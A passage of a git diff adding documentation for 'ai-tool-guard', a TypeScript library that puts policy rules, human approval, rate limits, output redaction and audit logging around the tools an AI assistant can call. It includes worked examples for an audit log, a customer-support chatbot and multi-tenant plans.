injection is suspected. `"downgrade"` converts the verdict to `"require-approval"`, `"deny"` blocks the call, `"log"` records but allows. Default: `"log"` | +| `detect` | `(args: Record) => number \| Promise` | No | Custom detector function; overrides the built-in heuristic. Return a suspicion score 0–1. | + +--- + +## MCP + +### `McpToolFingerprint` + +Pinned schema fingerprint for a single MCP tool. + +| Field | Type | Required | Description | +|---|---|---|---| +| `toolName` | `string` | Yes | Name of the tool | +| `serverId` | `string` | Yes | Identifier of the MCP server | +| `schemaHash` | `string` | Yes | SHA-256 hex hash of the canonicalized `{ toolName, schema }` object | +| `pinnedAt` | `string` | Yes | ISO-8601 timestamp of when the fingerprint was created | +| `environment` | `string` | No | Environment tag such as `"production"` or `"staging"` | + +--- + +### `McpDriftResult` + +Aggregate result returned by `detectDrift()`. + +| Field | Type | Description | +|---|---|---| +| `drifted` | `boolean` | `true` when at least one tool has changed or is not pinned | +| `changes` | `McpDriftChange[]` | Detailed records for each changed or unpinned tool | + +--- + +### `McpDriftChange` + +Detail record for a single tool that has drifted from its pinned fingerprint. + +| Field | Type | Description | +|---|---|---| +| `toolName` | `string` | Name of the changed tool | +| `serverId` | `string` | MCP server identifier | +| `expectedHash` | `string` | Pinned hash, or `"(not pinned)"` for tools without a stored fingerprint | +| `actualHash` | `string` | Currently computed hash | +| `remediation` | `string` | Human-readable description of what changed and recommended action | + +--- + +## OTel + +### `OtelConfig` + +Configuration for the OpenTelemetry integration. + +| Field | Type | Required | Description | +|---|---|---|---| +| `enabled` | `boolean` | No | Set to `false` to disable tracing entirely and use no-op spans. Default: `true` when `@opentelemetry/api` is available | +| `tracerName` | `string` | No | Tracer name registered with the OTel provider. Default: `"ai-tool-guard"` | +| `defaultAttributes` | `Record` | No | Attributes merged into every span emitted by span helper functions | + +--- + +## Top-level + +### `GuardOptions` + +The main configuration object passed to `createToolGuard()`. Controls all aspects +of the guard pipeline. + +| Field | Type | Required | Description | +|---|---|---|---| +| `rules` | `PolicyRule[]` | No | Built-in policy rules evaluated for every tool call | +| `backend` | `PolicyBackend` | No | External policy backend (OPA, Cedar, custom); takes priority over built-in rules | +| `defaultRiskLevel` | `RiskLevel` | No | Fallback risk level for tools without explicit `ToolGuardConfig.riskLevel`. Default: `"low"` | +| `onApprovalRequired` | `ApprovalHandler` | No | Callback invoked when a policy verdict or tool config requires human approval | +| `injectionDetection` | `InjectionDetectorConfig` | No | Global injection detection applied to all tool calls | +| `defaultRateLimit` | `RateLimitConfig` | No | Default rate limit applied to all tools that do not specify their own | +| `defaultMaxConcurrency` | `number` | No | Default concurrency cap applied to all tools that do not specify their own | +| `otel` | `OtelConfig` | No | OpenTelemetry configuration | +| `dryRun` | `boolean` | No | When `true`, policy is evaluated and decisions are recorded, but tools are not executed | +| `onDecision` | `(record: DecisionRecord) => void \| Promise` | No | Callback fired for every policy decision; use for logging, metrics, or audit trails | +| `resolveUserAttributes` | `() => Record \| Promise>` | No | Async resolver called per invocation to populate `PolicyContext.userAttributes` | +| `resolveConversationContext` | `() => ConversationContext \| Promise` | No | Async resolver called per invocation to populate `PolicyContext.conversation` | diff --git a/docs/examples/audit-logging.md b/docs/examples/audit-logging.md new file mode 100644 index 0000000..ea54341 --- /dev/null +++ b/docs/examples/audit-logging.md @@ -0,0 +1,507 @@ +# Complete Audit Trail + +This example builds a comprehensive audit system on top of `ai-tool-guard`. Every decision — allow, deny, or require-approval — is written to a structured JSON lines log. Output filter redactions are tracked alongside policy decisions. OpenTelemetry spans are correlated with decision records. A simple alerting function detects repeated denials in the same session. + +--- + +## Decision record structure + +The `DecisionRecord` type captures the full context of every policy evaluation. Understanding its fields is the foundation of any audit system. + +```ts +interface DecisionRecord { + id: string; // Unique ID for correlation with OTel spans and logs + timestamp: string; // ISO-8601 (e.g. "2026-02-17T14:23:01.123Z") + verdict: "allow" | "deny" | "require-approval"; + toolName: string; + matchedRules: string[]; // IDs of the rules that produced this verdict + riskLevel: "low" | "medium" | "high" | "critical"; + riskCategories: string[]; // e.g. ["data-write", "pii"] + attributes: Record; // userAttributes snapshot + reason: string; // Human-readable explanation + redactions?: string[]; // Output filter redaction trail + evalDurationMs: number; // Policy evaluation time in ms + dryRun: boolean; +} +``` + +--- + +## Structured audit logger + +The logger writes every decision to a JSON lines file, routing events through separate handlers for each verdict type. + +```ts title="lib/audit-logger.ts" +import { appendFileSync, mkdirSync } from "node:fs"; +import { dirname } from "node:path"; +import type { DecisionRecord } from "ai-tool-guard"; + +export interface AuditEvent { + /** ISO-8601 write timestamp (may differ slightly from record.timestamp). */ + writtenAt: string; + record: DecisionRecord; +} + +export class AuditLogger { + private readonly logPath: string; + + constructor(logPath: string) { + this.logPath = logPath; + mkdirSync(dirname(logPath), { recursive: true }); + } + + /** Write a decision record to the log. */ + write(record: DecisionRecord): void { + const event: AuditEvent = { + writtenAt: new Date().toISOString(), + record, + }; + + try { + appendFileSync(this.logPath, JSON.stringify(event) + "\n", { + encoding: "utf8", + flag: "a", + }); + } catch (err) { + // Audit failures must never crash the application. + console.error("[audit] Write failed:", (err as Error).message, record.id); + } + } + + /** Handler for allowed decisions. */ + onAllow(record: DecisionRecord): void { + if (record.redactions && record.redactions.length > 0) { + console.info( + `[audit:allow+redact] id=${record.id} tool=${record.toolName} ` + + `redactions=${record.redactions.join(",")}` + ); + } + this.write(record); + } + + /** Handler for denied decisions. */ + onDeny(record: DecisionRecord): void { + console.warn( + `[audit:deny] id=${record.id} tool=${record.toolName} ` + + `rules=${record.matchedRules.join(",")} reason="${record.reason}"` + ); + this.write(record); + } + + /** Handler for approval-required decisions. */ + onApprovalRequired(record: DecisionRecord): void { + console.info( + `[audit:approval] id=${record.id} tool=${record.toolName} ` + + `risk=${record.riskLevel}` + ); + this.write(record); + } + + /** Dispatch a record to the appropriate handler. */ + dispatch(record: DecisionRecord): void { + switch (record.verdict) { + case "allow": + this.onAllow(record); + break; + case "deny": + this.onDeny(record); + break; + case "require-approval": + this.onApprovalRequired(record); + break; + } + } +} + +export const auditLogger = new AuditLogger("/var/log/tool-guard/decisions.jsonl"); +``` + +--- + +## Alert on repeated denials + +A session that accumulates multiple denials in a short window may indicate an adversarial prompt or a misconfigured model. The alerter reads recent denials from an in-memory ring buffer and fires when a threshold is crossed. + +```ts title="lib/denial-alerter.ts" +import type { DecisionRecord } from "ai-tool-guard"; + +interface DenialEvent { + toolName: string; + timestamp: number; + reason: string; + decisionId: string; +} + +export class DenialAlerter { + /** Per-session denial ring buffers. */ + private readonly buffers = new Map(); + + /** Threshold: fire an alert if this many denials occur within windowMs. */ + constructor( + private readonly threshold: number = 3, + private readonly windowMs: number = 60_000 + ) {} + + /** + * Record a denial and fire the alert callback if the threshold is reached. + */ + record( + sessionId: string, + record: DecisionRecord, + onAlert: (sessionId: string, events: DenialEvent[]) => void + ): void { + if (record.verdict !== "deny") return; + + const now = Date.now(); + + // Prune events outside the window. + const buffer = (this.buffers.get(sessionId) ?? []).filter( + (e) => now - e.timestamp < this.windowMs + ); + + buffer.push({ + toolName: record.toolName, + timestamp: now, + reason: record.reason, + decisionId: record.id, + }); + + this.buffers.set(sessionId, buffer); + + if (buffer.length >= this.threshold) { + onAlert(sessionId, [...buffer]); + } + } + + /** Clear the buffer for a session (e.g. after an alert is acknowledged). */ + clear(sessionId: string): void { + this.buffers.delete(sessionId); + } +} + +export const denialAlerter = new DenialAlerter(3, 60_000); +``` + +--- + +## OpenTelemetry correlation + +`ai-tool-guard` emits an `ai_tool_guard.policy_eval` span for every decision. The span carries `ai_tool_guard.tool.name` as an attribute, which you can use to correlate spans with decision records. + +The example below creates the guard with OTel enabled and uses `spanFromDecision` directly in a custom wrapper to attach the decision ID to the span as an additional attribute. + +```ts title="lib/otel-guard.ts" +import { + createToolGuard, + spanFromDecision, + createTracer, + allow, + requireApproval, + deny, + type DecisionRecord, +} from "ai-tool-guard"; +import { auditLogger } from "./audit-logger"; +import { denialAlerter } from "./denial-alerter"; + +// Tracer shared with the rest of the application. +// The guard creates its own internal tracer via the otel config, but you +// can use createTracer to obtain the same tracer for manual instrumentation. +const tracer = createTracer({ tracerName: "ai-tool-guard" }); + +export function createAuditedGuard(sessionId: string) { + return createToolGuard({ + rules: [ + allow({ + tools: ["readDocument", "searchDocuments"], + riskLevels: ["low"], + description: "Read operations are safe to execute autonomously.", + priority: 10, + }), + requireApproval({ + tools: ["writeDocument", "deleteDocument"], + riskLevels: ["medium", "high"], + description: "Write and delete operations require approval.", + priority: 20, + }), + deny({ + tools: "purgeAll", + riskLevels: ["critical"], + description: "Bulk purge is never permitted through the AI assistant.", + priority: 100, + }), + ], + + defaultRiskLevel: "medium", + + otel: { + enabled: true, + tracerName: "ai-tool-guard", + defaultAttributes: { + "service.name": "document-assistant", + "deployment.environment": "production", + "session.id": sessionId, + }, + }, + + onApprovalRequired: async (token) => { + console.info(`[approval] token=${token.id} tool=${token.toolName}`); + return { approved: false, reason: "Approval workflow not configured." }; + }, + + onDecision: (record: DecisionRecord) => { + // 1. Dispatch to the structured audit logger. + auditLogger.dispatch(record); + + // 2. Attach the decision ID to a new span for cross-signal correlation. + // When you search by decision ID in your log, you can find the + // corresponding trace by looking up this span in your OTel backend. + const correlationSpan = tracer.startSpan("ai_tool_guard.decision_logged", { + attributes: { + "ai_tool_guard.decision.id": record.id, + "ai_tool_guard.tool.name": record.toolName, + "ai_tool_guard.decision.verdict": record.verdict, + "session.id": sessionId, + }, + }); + correlationSpan.end(); + + // 3. Alert on repeated denials. + denialAlerter.record(sessionId, record, (sid, events) => { + console.error( + `[ALERT] Session ${sid} has ${events.length} denials in 60 s: ` + + events.map((e) => e.toolName).join(", ") + ); + + // Emit an alert span that will appear in your trace backend. + const alertSpan = tracer.startSpan("ai_tool_guard.denial_alert", { + attributes: { + "session.id": sid, + "alert.denial_count": events.length, + "alert.tools": events.map((e) => e.toolName).join(","), + }, + }); + alertSpan.end(); + }); + }, + }); +} +``` + +--- + +## Querying the audit log + +The JSON lines format makes the log easy to parse with standard tools or a simple query function. + +```ts title="lib/audit-query.ts" +import { createReadStream } from "node:fs"; +import { createInterface } from "node:readline"; +import type { AuditEvent } from "./audit-logger"; + +/** + * Read all decisions from the log file and apply an optional predicate. + */ +export async function queryAuditLog( + logPath: string, + predicate?: (event: AuditEvent) => boolean +): Promise { + const results: AuditEvent[] = []; + + const rl = createInterface({ + input: createReadStream(logPath, { encoding: "utf8" }), + crlfDelay: Infinity, + }); + + for await (const line of rl) { + if (!line.trim()) continue; + try { + const event = JSON.parse(line) as AuditEvent; + if (!predicate || predicate(event)) { + results.push(event); + } + } catch { + // Skip malformed lines. + } + } + + return results; +} + +// --------------------------------------------------------------------------- +// Example queries +// --------------------------------------------------------------------------- + +/** All denials for a specific session. */ +export async function getDenialsForSession( + logPath: string, + sessionId: string +): Promise { + return queryAuditLog( + logPath, + (e) => + e.record.verdict === "deny" && + e.record.attributes["sessionId"] === sessionId + ); +} + +/** All records for a specific tool, newest first. */ +export async function getToolHistory( + logPath: string, + toolName: string +): Promise { + const events = await queryAuditLog( + logPath, + (e) => e.record.toolName === toolName + ); + return events.sort( + (a, b) => + new Date(b.record.timestamp).getTime() - + new Date(a.record.timestamp).getTime() + ); +} + +/** All decisions where output was redacted. */ +export async function getRedactionEvents( + logPath: string +): Promise { + return queryAuditLog( + logPath, + (e) => + e.record.verdict === "allow" && + Array.isArray(e.record.redactions) && + e.record.redactions.length > 0 + ); +} + +/** Summary statistics grouped by verdict. */ +export async function verdictSummary(logPath: string): Promise<{ + allow: number; + deny: number; + "require-approval": number; +}> { + const counts = { allow: 0, deny: 0, "require-approval": 0 }; + const events = await queryAuditLog(logPath); + for (const e of events) { + counts[e.record.verdict]++; + } + return counts; +} +``` + +--- + +## Putting it together in a route + +```ts title="app/api/chat/route.ts" +import { streamText } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { tool } from "ai"; +import { z } from "zod"; +import { ToolGuardError, secretsFilter } from "ai-tool-guard"; +import { createAuditedGuard } from "@/lib/otel-guard"; + +export async function POST(request: Request) { + const { messages, sessionId } = await request.json(); + + const guard = createAuditedGuard(sessionId as string); + + const readDocumentTool = tool({ + description: "Read a document by ID.", + parameters: z.object({ docId: z.string() }), + execute: async ({ docId }) => ({ + docId, + content: "Document content here...", + author: "alice@example.com", // will be redacted + }), + }); + + const writeDocumentTool = tool({ + description: "Write or update a document.", + parameters: z.object({ docId: z.string(), content: z.string() }), + execute: async ({ docId, content }) => ({ saved: true, docId, content }), + }); + + const tools = guard.guardTools({ + readDocument: { + tool: readDocumentTool, + riskLevel: "low", + riskCategories: ["data-read"], + outputFilters: [secretsFilter()], + }, + writeDocument: { + tool: writeDocumentTool, + riskLevel: "medium", + riskCategories: ["data-write"], + }, + }); + + try { + const result = streamText({ + model: openai("gpt-4o-mini"), + messages, + tools, + maxSteps: 3, + }); + + return result.toDataStreamResponse(); + } catch (err) { + if (err instanceof ToolGuardError) { + return Response.json( + { + error: "tool_guard_error", + code: err.code, + tool: err.toolName, + decisionId: err.decision?.id, + }, + { status: err.code === "rate-limited" ? 429 : 403 } + ); + } + + console.error("Unexpected error:", err); + return Response.json({ error: "internal_error" }, { status: 500 }); + } +} +``` + +--- + +## Sample log output + +A typical `decisions.jsonl` file looks like this. Each line is a complete, self-contained JSON object suitable for ingestion into Elasticsearch, Loki, or any structured log platform. + +```json +{"writtenAt":"2026-02-17T14:23:01.456Z","record":{"id":"rec_abc123","timestamp":"2026-02-17T14:23:01.123Z","verdict":"allow","toolName":"readDocument","matchedRules":["allow-1"],"riskLevel":"low","riskCategories":["data-read"],"attributes":{"sessionId":"sess_xyz","userId":"user_001"},"reason":"Tool matched allow rule: Read operations are safe to execute autonomously.","redactions":["pii-output-filter:email"],"evalDurationMs":2,"dryRun":false}} +{"writtenAt":"2026-02-17T14:23:45.789Z","record":{"id":"rec_def456","timestamp":"2026-02-17T14:23:45.500Z","verdict":"deny","toolName":"purgeAll","matchedRules":["deny-1"],"riskLevel":"critical","riskCategories":["data-delete"],"attributes":{"sessionId":"sess_xyz","userId":"user_001"},"reason":"Tool matched deny rule: Bulk purge is never permitted through the AI assistant.","evalDurationMs":1,"dryRun":false}} +{"writtenAt":"2026-02-17T14:24:10.321Z","record":{"id":"rec_ghi789","timestamp":"2026-02-17T14:24:10.100Z","verdict":"require-approval","toolName":"writeDocument","matchedRules":["require-approval-1"],"riskLevel":"medium","riskCategories":["data-write"],"attributes":{"sessionId":"sess_xyz","userId":"user_001"},"reason":"Tool matched require-approval rule: Write and delete operations require approval.","evalDurationMs":3,"dryRun":false}} +``` + +--- + +## Compliance checklist + +When building for regulated environments, verify that your audit setup covers the following. + +| Requirement | How it is met | +|---|---| +| Every tool call is logged | `onDecision` fires for every verdict, including `allow` | +| Denials include the reason | `record.reason` and `record.matchedRules` | +| Output mutations are tracked | `record.redactions` lists every filter and field name | +| Approvals are recorded | `require-approval` verdict written to log; `approvedBy` available via the approval handler | +| Timestamps are tamper-evident | Append-only log file; use a WORM store in production | +| Decisions are traceable in OTel | Decision ID attached to `ai_tool_guard.decision_logged` span | +| Alerts on anomalies | `DenialAlerter` fires on session-level denial bursts | + +!!! tip "Long-term storage" + For compliance archives, ship the JSONL file to an immutable object store (AWS S3 with Object Lock, GCS with retention policies) at the end of each day. Keep the live file on fast local storage for real-time queries. + +!!! warning "PII in decision records" + The `attributes` field contains the full `userAttributes` snapshot, which may include user IDs, email addresses, or role data. Ensure your log storage is access-controlled and review your data retention policy before enabling long-term archival. + +--- + +## Related + +- [Decision Records](../guides/decision-records.md) — full `DecisionRecord` field reference. +- [OpenTelemetry](../guides/opentelemetry.md) — span names, attributes, and SDK setup. +- [Output Filtering](../guides/output-filtering.md) — how redactions are tracked and reported. +- [Error Handling](../guides/error-handling.md) — `ToolGuardError` and the `decision` property. diff --git a/docs/examples/chatbot-safety.md b/docs/examples/chatbot-safety.md new file mode 100644 index 0000000..a7a7d3d --- /dev/null +++ b/docs/examples/chatbot-safety.md @@ -0,0 +1,486 @@ +# Building a Safe Chatbot + +This example builds a customer support chatbot with layered defenses: injection detection on incoming input, argument validation on every tool call, output filtering to prevent data leakage, conversation-aware escalation, and rate limiting to resist abuse. All five tools operate at different risk levels so you can see how the guard behaves across the spectrum. + +--- + +## Tool inventory + +| Tool | Risk | Category | Guard behaviour | +|---|---|---|---| +| `lookupOrder` | low | data-read | Allow; scrub PII from output | +| `updateAddress` | medium | data-write, pii | Require approval; validate address format | +| `issueRefund` | high | payment | Require approval; validate reason allowlist | +| `deleteAccount` | critical | data-delete | Deny always | +| `exportData` | high | data-read | Deny unless admin role; scrub secrets from output | + +--- + +## Complete guard setup + +```ts title="lib/chatbot-guard.ts" +import { + createToolGuard, + allow, + deny, + requireApproval, + type DecisionRecord, + type ConversationContext, +} from "ai-tool-guard"; +import { appendFileSync } from "node:fs"; + +// --------------------------------------------------------------------------- +// Conversation context store +// +// In production, back this with a session store (Redis, DynamoDB, etc.). +// --------------------------------------------------------------------------- +const sessions = new Map(); + +export function getSession(sessionId: string): ConversationContext { + if (!sessions.has(sessionId)) { + sessions.set(sessionId, { + sessionId, + riskScore: 0, + priorFailures: 0, + recentApprovals: [], + }); + } + return sessions.get(sessionId)!; +} + +export function updateSession( + sessionId: string, + patch: Partial +): void { + const current = getSession(sessionId); + sessions.set(sessionId, { ...current, ...patch }); +} + +// --------------------------------------------------------------------------- +// Audit log — append-only JSON lines file +// --------------------------------------------------------------------------- +const AUDIT_LOG = "/var/log/chatbot-audit.jsonl"; + +function writeAudit(record: DecisionRecord): void { + try { + appendFileSync(AUDIT_LOG, JSON.stringify(record) + "\n"); + } catch { + // Audit write failures must never crash the request. + console.error("Audit log write failed", record.id); + } +} + +// --------------------------------------------------------------------------- +// Guard factory +// --------------------------------------------------------------------------- + +export function createChatbotGuard(sessionId: string) { + return createToolGuard({ + // ------------------------------------------------------------------ + // Policy rules — evaluated in descending priority order. + // ------------------------------------------------------------------ + rules: [ + // Hard block on account deletion — no conditions, no exceptions. + deny({ + tools: "deleteAccount", + riskLevels: ["critical"], + description: "Account deletion is never permitted through the AI assistant.", + priority: 100, + }), + + // Escalate entire session if risk score is too high. + deny({ + tools: "*", + description: "Session risk score exceeds safe threshold.", + condition: (ctx) => (ctx.conversation?.riskScore ?? 0) > 0.8, + priority: 90, + }), + + // After three prior failures in a session, require approval for everything. + requireApproval({ + tools: "*", + description: "Session has accumulated too many failures.", + condition: (ctx) => (ctx.conversation?.priorFailures ?? 0) >= 3, + priority: 80, + }), + + // Data export is admin-only. + deny({ + tools: "exportData", + description: "Data export restricted to admin users.", + condition: (ctx) => ctx.userAttributes["role"] !== "admin", + priority: 70, + }), + + // High-risk tools require approval. + requireApproval({ + tools: ["issueRefund", "exportData"], + riskLevels: ["high"], + description: "High-risk tools require human sign-off.", + priority: 50, + }), + + // Medium-risk tools require approval. + requireApproval({ + tools: "updateAddress", + riskLevels: ["medium"], + description: "Address changes require human confirmation.", + priority: 40, + }), + + // Low-risk reads are allowed outright. + allow({ + tools: "lookupOrder", + riskLevels: ["low"], + description: "Read-only order lookups are safe to execute autonomously.", + priority: 10, + }), + ], + + defaultRiskLevel: "medium", + + // ------------------------------------------------------------------ + // Injection detection + // + // threshold: 0.5 — flag calls where the suspicion score meets or + // exceeds 50 %. action: "deny" — block suspected injections outright + // rather than downgrading or logging only. Public-facing chatbots + // should be strict here. + // ------------------------------------------------------------------ + injectionDetection: { + threshold: 0.5, + action: "deny", + }, + + // ------------------------------------------------------------------ + // Global rate limits + // + // Caps apply per tool name across all sessions sharing this guard + // instance. Per-tool overrides are set on individual tool configs. + // ------------------------------------------------------------------ + defaultRateLimit: { + maxCalls: 60, + windowMs: 60_000, // 60 calls per minute globally + strategy: "reject", + }, + + // ------------------------------------------------------------------ + // Approval handler — in this example, approvals are logged and + // auto-denied (implement a real UI in production). + // ------------------------------------------------------------------ + onApprovalRequired: async (token) => { + console.warn( + `[approval-required] tool=${token.toolName} token=${token.id}` + ); + return { + approved: false, + reason: "Automated approval not available. Contact support.", + }; + }, + + // ------------------------------------------------------------------ + // Conversation context — resolved fresh on every tool invocation. + // ------------------------------------------------------------------ + resolveConversationContext: () => getSession(sessionId), + + // ------------------------------------------------------------------ + // Decision callback — runs after every verdict. + // ------------------------------------------------------------------ + onDecision: (record) => { + // 1. Write to audit log. + writeAudit(record); + + // 2. Update session risk score on denial. + if (record.verdict === "deny") { + const session = getSession(sessionId); + updateSession(sessionId, { + riskScore: Math.min(1, (session.riskScore ?? 0) + 0.15), + priorFailures: (session.priorFailures ?? 0) + 1, + }); + } + + // 3. Track approvals in session context. + if (record.verdict === "require-approval") { + const session = getSession(sessionId); + updateSession(sessionId, { + recentApprovals: [ + ...(session.recentApprovals ?? []), + record.toolName, + ].slice(-10), // keep last 10 + }); + } + }, + }); +} +``` + +--- + +## Tool definitions with per-tool guards + +```ts title="lib/chatbot-tools.ts" +import { tool } from "ai"; +import { z } from "zod"; +import { + zodGuard, + allowlist, + piiGuard, + secretsFilter, + piiOutputFilter, +} from "ai-tool-guard"; +import { createChatbotGuard } from "./chatbot-guard"; + +// --------------------------------------------------------------------------- +// Raw tools +// --------------------------------------------------------------------------- + +const lookupOrderTool = tool({ + description: "Retrieve order status and shipment details.", + parameters: z.object({ orderId: z.string() }), + execute: async ({ orderId }) => ({ + orderId, + status: "in_transit", + carrier: "FedEx", + trackingNumber: "123456789012", + estimatedDelivery: "2026-02-20", + customerEmail: "customer@example.com", // redacted by piiOutputFilter + }), +}); + +const updateAddressTool = tool({ + description: "Change the delivery address on an unshipped order.", + parameters: z.object({ + orderId: z.string(), + newAddress: z.string(), + }), + execute: async ({ orderId, newAddress }) => ({ + success: true, + orderId, + updatedAddress: newAddress, + }), +}); + +const issueRefundTool = tool({ + description: "Issue a refund for a completed order.", + parameters: z.object({ + orderId: z.string(), + amount: z.number().positive(), + reason: z.string(), + }), + execute: async ({ orderId, amount, reason }) => ({ + success: true, + orderId, + refundedAmount: amount, + reason, + transactionId: "txn_abc123", + }), +}); + +const deleteAccountTool = tool({ + description: "Permanently delete a customer account.", + parameters: z.object({ userId: z.string() }), + execute: async ({ userId }) => ({ deleted: true, userId }), +}); + +const exportDataTool = tool({ + description: "Export all data for a customer account.", + parameters: z.object({ + userId: z.string(), + format: z.enum(["csv", "json"]), + }), + execute: async ({ userId, format }) => ({ + exportUrl: `https://internal.example.com/exports/${userId}.${format}`, + // Internal URL may contain credentials — secretsFilter will redact them. + downloadUrl: `https://internal.example.com/exports/${userId}.${format}?api_key=sk-prod-1234567890abcdef`, + }), +}); + +// --------------------------------------------------------------------------- +// Wrap with guard — call once per session +// --------------------------------------------------------------------------- + +export function buildTools(sessionId: string) { + const guard = createChatbotGuard(sessionId); + + return guard.guardTools({ + lookupOrder: { + tool: lookupOrderTool, + riskLevel: "low", + riskCategories: ["data-read"], + // Redact PII (email, phone) from order records returned to the model. + outputFilters: [piiOutputFilter()], + rateLimit: { maxCalls: 20, windowMs: 60_000 }, + }, + + updateAddress: { + tool: updateAddressTool, + riskLevel: "medium", + riskCategories: ["data-write", "pii"], + argGuards: [ + // Order IDs must follow the ORD-XXXXXX pattern. + zodGuard({ + field: "orderId", + schema: z.string().regex(/^ORD-\d{6,}$/, "Invalid order ID."), + }), + // Scan the user-supplied address field for PII before it reaches the tool. + piiGuard("newAddress"), + ], + outputFilters: [secretsFilter()], + rateLimit: { maxCalls: 5, windowMs: 60_000 }, + }, + + issueRefund: { + tool: issueRefundTool, + riskLevel: "high", + riskCategories: ["payment"], + argGuards: [ + zodGuard({ + field: "orderId", + schema: z.string().regex(/^ORD-\d{6,}$/, "Invalid order ID."), + }), + // Cap refund amounts per call. + zodGuard({ + field: "amount", + schema: z.number().positive().max(500), + }), + // Only these refund reasons are permitted. + allowlist("reason", [ + "damaged_item", + "not_received", + "wrong_item", + "duplicate_charge", + ]), + ], + outputFilters: [secretsFilter()], + rateLimit: { maxCalls: 3, windowMs: 60_000 }, + }, + + deleteAccount: { + tool: deleteAccountTool, + riskLevel: "critical", + riskCategories: ["data-delete"], + // No filters needed — the deny rule fires before execution. + }, + + exportData: { + tool: exportDataTool, + riskLevel: "high", + riskCategories: ["data-read"], + outputFilters: [secretsFilter()], + rateLimit: { maxCalls: 2, windowMs: 3_600_000 }, // 2 per hour + }, + }); +} +``` + +--- + +## Using the tools in a route + +```ts title="app/api/chat/route.ts" +import { streamText } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { ToolGuardError } from "ai-tool-guard"; +import { buildTools } from "@/lib/chatbot-tools"; + +export async function POST(request: Request) { + const { messages, sessionId } = await request.json(); + + // Build a fresh tool set bound to this session's context and risk state. + const tools = buildTools(sessionId as string); + + try { + const result = streamText({ + model: openai("gpt-4o-mini"), + system: + "You are a helpful customer support agent. " + + "Never attempt to delete accounts or export bulk data. " + + "Always confirm order IDs before taking action.", + messages, + tools, + maxSteps: 4, + }); + + return result.toDataStreamResponse(); + } catch (err) { + if (err instanceof ToolGuardError) { + const statusMap: Record = { + "policy-denied": 403, + "injection-detected": 400, + "rate-limited": 429, + "arg-validation-failed": 422, + "output-blocked": 500, + }; + + return Response.json( + { + error: "tool_guard_error", + code: err.code, + tool: err.toolName, + message: err.message, + decision: err.decision + ? { + id: err.decision.id, + matchedRules: err.decision.matchedRules, + reason: err.decision.reason, + } + : undefined, + }, + { status: statusMap[err.code] ?? 403 } + ); + } + + console.error("Unexpected error:", err); + return Response.json({ error: "internal_error" }, { status: 500 }); + } +} +``` + +--- + +## How the layers interact + +The guard processes each tool invocation through a fixed pipeline. Understanding the order helps predict which layer fires when multiple conditions are true simultaneously. + +``` +Incoming tool call + │ + ▼ +1. Injection detection (threshold 0.5, action "deny") + │ suspected → ToolGuardError("injection-detected") + ▼ +2. Argument guards (zodGuard, allowlist, piiGuard) + │ violation → ToolGuardError("arg-validation-failed") + ▼ +3. Policy evaluation (rules in priority order, conversation context) + │ deny → ToolGuardError("policy-denied") + │ approval → onApprovalRequired callback + ▼ +4. Rate limiting (per-tool maxCalls / windowMs) + │ exceeded → ToolGuardError("rate-limited") + ▼ +5. Tool execution + │ + ▼ +6. Output filters (secretsFilter, piiOutputFilter) + │ blocked → ToolGuardError("output-blocked") + ▼ +Final result returned to the model +``` + +!!! info "Conversation risk score" + The `riskScore` stored in the session context is updated in `onDecision` after every denial. Once it exceeds 0.8, a high-priority `deny` rule fires for all subsequent tool calls in that session, regardless of the tool's own risk level. This provides a circuit-breaker against adversarial conversation loops. + +!!! warning "piiGuard on input vs piiOutputFilter on output" + `piiGuard` (applied via `argGuards`) blocks calls where the model passes PII in the arguments. `piiOutputFilter` (applied via `outputFilters`) redacts PII from the tool's return value before the model sees it. Use both together for end-to-end PII coverage. + +--- + +## Related + +- [Policy Engine](../guides/policy-engine.md) — rule priority and escalation semantics. +- [Injection Detection](../guides/injection-detection.md) — threshold tuning and custom detectors. +- [Argument Validation](../guides/argument-validation.md) — `zodGuard`, `allowlist`, `piiGuard`. +- [Output Filtering](../guides/output-filtering.md) — `secretsFilter` and `piiOutputFilter`. +- [Rate Limiting](../guides/rate-limiting.md) — per-tool and global limits. +- [Conversation-Aware Policies](../guides/conversation-aware-policies.md) — `ConversationContext` in depth. diff --git a/docs/examples/multi-tenant.md b/docs/examples/multi-tenant.md new file mode 100644 index 0000000..882ab8f --- /dev/null +++ b/docs/examples/multi-tenant.md @@ -0,0 +1,476 @@ +# Multi-Tenant Policies + +This example models a SaaS platform where different tenants receive different tool access depending on their subscription plan and the user's role within that tenant. The guard is instantiated per-request, and `resolveUserAttributes` returns a full tenant context that policy rules can inspect. + +--- + +## Tenant model + +| Plan | Roles | What they can do | +|---|---|---| +| free | viewer | Read-only tool access | +| pro | viewer, editor | Read + write; no bulk operations | +| enterprise | viewer, editor, admin | Full access including bulk operations and admin tools | + +--- + +## Tenant context resolver + +The `resolveUserAttributes` callback is called once per tool invocation. It should read from your authentication layer — a JWT, a session cookie, or a middleware-injected header. + +```ts title="lib/tenant.ts" +export interface TenantContext { + tenantId: string; + userId: string; + plan: "free" | "pro" | "enterprise"; + role: "viewer" | "editor" | "admin"; +} + +/** + * In production, decode a JWT or call your auth service. + * Here we simulate a lookup from request headers. + */ +export function resolveTenantContext(request: Request): TenantContext { + // These would typically come from a validated JWT payload. + const tenantId = request.headers.get("x-tenant-id") ?? "unknown"; + const userId = request.headers.get("x-user-id") ?? "unknown"; + const plan = (request.headers.get("x-tenant-plan") ?? "free") as TenantContext["plan"]; + const role = (request.headers.get("x-user-role") ?? "viewer") as TenantContext["role"]; + + return { tenantId, userId, plan, role }; +} +``` + +--- + +## Guard factory + +The guard is created per-request so that `resolveUserAttributes` captures the current request context via closure. + +```ts title="lib/tenant-guard.ts" +import { + createToolGuard, + allow, + deny, + requireApproval, + type DecisionRecord, + type PolicyContext, +} from "ai-tool-guard"; +import { type TenantContext } from "./tenant"; + +// --------------------------------------------------------------------------- +// Per-tenant audit log +// +// Write to a per-tenant partition so that logs can be queried and +// exported independently for each customer. +// --------------------------------------------------------------------------- +import { appendFileSync, mkdirSync } from "node:fs"; +import { join } from "node:path"; + +function tenantAuditLog(tenantId: string, record: DecisionRecord): void { + const dir = `/var/log/tenants/${tenantId}`; + try { + mkdirSync(dir, { recursive: true }); + appendFileSync(join(dir, "audit.jsonl"), JSON.stringify(record) + "\n"); + } catch { + console.error(`[audit] Failed to write for tenant ${tenantId}`, record.id); + } +} + +// --------------------------------------------------------------------------- +// Guard factory +// --------------------------------------------------------------------------- + +export function createTenantGuard(tenant: TenantContext) { + return createToolGuard({ + // ------------------------------------------------------------------ + // Policy rules + // ------------------------------------------------------------------ + rules: [ + // ---------------------------------------------------------------- + // Free plan: read-only access only. + // 